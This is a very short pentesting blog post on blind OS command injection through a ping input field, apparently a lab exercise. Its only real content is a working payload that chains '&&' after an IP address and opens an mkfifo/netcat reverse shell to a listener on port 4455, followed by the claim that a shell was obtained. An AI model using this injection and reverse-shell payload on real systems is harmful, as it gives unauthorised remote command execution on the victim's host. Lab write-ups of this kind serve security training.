OS Command Injection –Blind

07 Feb 2018 • Web-Pentesting

From this we can ping any IP address

But We are not getting any response as it is restricted so we have to play it blindly
192.168.140.136 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.140.136 4455 >/tmp/f
And we got the shell

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments

Related Posts

DIVA - Binary From Hell 😈 22 Aug 2020

DIVA - Environment setup 15 Aug 2020

DIVA - Insecure Logging 15 Aug 2020